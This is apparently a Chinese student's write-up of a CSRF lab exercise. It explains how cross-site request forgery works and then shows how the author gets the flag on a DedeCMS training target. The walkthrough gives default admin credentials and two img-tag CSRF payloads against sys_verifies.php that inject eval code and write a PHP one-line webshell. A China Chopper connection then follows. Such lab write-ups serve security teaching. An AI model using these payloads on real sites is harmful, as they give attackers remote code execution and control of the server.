CSRF跨站请求伪造
CSRF跨站请求伪造作业
首先我们梳理一下csrf的过程,有一个A站(受攻击站),B站(我们伪造的恶意站点),受害者在浏览器打开了A站,浏览器记录了A站的cookie,而且我们没有关闭A站,回话持续生效,cookie也持续生效;然后我们打开了恶意网站B,浏览器加载恶意网站B,里面有请求加载A站的连接,浏览器不知道是用户发出的还是恶意网站B发出的(其实是B网站发出的)浏览器没有意识,它就执行了这个请求(以及连接请求后的一系列参数),并且附带A站的cookie去与A站服务器交互,A站服务器一看cookie没错,允许交互,攻击就形成了。
在本次靶场实战中,我们由于自己缺乏服务器,由自己扮演受害者(我打我自己)访问想要在恶意网站中添加的两条语句(一句话木马,获得getshell),其实这个过程是浏览器该干的—-菜刀连接进入服务器拿到flag。
首先我们进入靶场:http://59.63.200.79:8010/csrf/uploads/
使用工具:中国菜刀
找到靶场后台登录地址:我们可以使用御剑扫描或者复制cms版本号,找到没有修改的

版本号。

上谷歌语法。

扮演受害管理员:我们登录(admin/admin123)

进入,在不关闭的情况下执行两条语句,以url形式传参,正常的话是要放入伪造站点以图片加载形式传参的:
<img
src="http://59.63.200.79:8010/csrf/uploads/dede/sys_verifies.php?action=getfiles&refiles[0]=123&refiles[1]=\%22;eval($_GET[a]);die();//">

执行第一条。
<img src="http://59.63.200.79:8010/csrf/uploads/dede/sys_verifies.php?action=down&a=$a='<?php @eval($_POST[\'a\'])?>';file_put_contents('qiuzhiyu.php',$a);echo 'ok!';">

执行第二句。
然后菜刀连接:


进入:

获得flag.
-------------------------------------------
个性签名:你有一个苹果,我有一个苹果,我们交换一下,一人还是只有一个苹果;你有一种思想,我有一种思想,我们交换一下,一个人就有两种思想。
如果觉得这篇文章对你有小小的帮助的话,记得在右下角点个“推荐”哦,博主在此感谢!
独学而无友,则孤陋而寡闻,开源、分享、白嫖!

浙公网安备 33010602011771号